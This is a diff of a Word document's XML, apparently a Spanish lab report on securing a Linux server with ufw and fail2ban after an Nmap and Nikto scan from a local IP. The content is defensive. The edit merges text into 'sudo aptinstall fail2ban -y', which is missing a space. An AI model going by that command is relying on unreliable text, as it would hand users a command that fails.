             <wp:docPr id="666037047" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1405,7 +1966,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1413,7 +1974,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5406814" cy="3343276"/>
+                      <a:ext cx="5399290" cy="3338623"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1455,31 +2016,19 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ufw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>sudo ufw</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>deny</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>from</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 192.168.0.126</w:t>
+      <w:r>
+        <w:t>from 192.168.0.126</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1489,9 +2038,10 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21F0E0C7" wp14:editId="30EBEEE9">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="3429000" cy="838200"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="336187171" name="Imagen 1"/>
@@ -1506,7 +2056,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1529,8 +2079,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:pict w14:anchorId="0432C1B0">
-          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        <w:pict>
+          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -1579,23 +2129,7 @@
         <w:t>Instalación</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>install</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> fail2ban -y</w:t>
+        <w:t>: sudo aptinstall fail2ban -y</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1610,7 +2144,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Función</w:t>
       </w:r>
       <w:r>
@@ -1632,15 +2165,7 @@
         <w:t>Comando de verificación</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: sudo fail2ban-client status </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sshd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>: sudo fail2ban-client status sshd.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1650,9 +2175,10 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64A430D3" wp14:editId="09F20AD0">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4914900" cy="2390775"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="441601688" name="Imagen 1"/>
@@ -1667,7 +2193,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1690,8 +2216,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:pict w14:anchorId="2A3D3968">
-          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        <w:pict>
+          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -1758,30 +2284,13 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Resultado</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Se identificó un escaneo de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> y </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nikto</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> desde la IP 192.168.0.126. Se procedió al bloqueo mediante reglas de Firewall, logrando neutralizar el ataque.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
+        <w:t>: Se identificó un escaneo de Nmap y Nikto desde la IP 192.168.0.126. Se procedió al bloqueo mediante reglas de Firewall, logrando neutralizar el ataque.</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
@@ -1793,8 +2302,8 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
-  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+<w:numbering xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:abstractNum w:abstractNumId="0">
     <w:nsid w:val="025647EA"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="59EC39F4"/>
@@ -1943,7 +2452,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="1">
     <w:nsid w:val="0B403E4E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="03E00BBE"/>
@@ -2092,7 +2601,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2">
     <w:nsid w:val="0B4054B8"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="D6A8686C"/>
@@ -2205,7 +2714,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3">
     <w:nsid w:val="0DF93B41"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="C67E5E2E"/>
@@ -2354,7 +2863,156 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4">
+    <w:nsid w:val="13600E3D"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="CAF6D5B0"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="1814749B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="4FEEB850"/>
@@ -2503,7 +3161,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6">
     <w:nsid w:val="203D7B7B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FC4822C6"/>
@@ -2652,7 +3310,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7">
     <w:nsid w:val="20830122"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="2D8486E4"/>
@@ -2801,7 +3459,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8">
     <w:nsid w:val="2B535B36"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F1BE8C0E"/>
@@ -2950,7 +3608,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9">
     <w:nsid w:val="2C655101"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="910616E2"/>
@@ -3063,7 +3721,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10">
     <w:nsid w:val="327A380D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="34BC8B30"/>
@@ -3212,7 +3870,156 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11">
+    <w:nsid w:val="3727187F"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="ECEA7178"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="12">
     <w:nsid w:val="45F466D2"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="B0261E2A"/>
@@ -3361,7 +4168,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13">
     <w:nsid w:val="4CA34652"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="18A038C4"/>
@@ -3510,7 +4317,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14">
     <w:nsid w:val="51AE544D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="B26ECC24"/>
@@ -3659,7 +4466,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15">
     <w:nsid w:val="5C6254FC"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="300A5DCA"/>
@@ -3808,7 +4615,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16">
     <w:nsid w:val="5CF14FFD"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A008CE18"/>
@@ -3957,7 +4764,156 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17">
+    <w:nsid w:val="6822351F"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="2E748D26"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
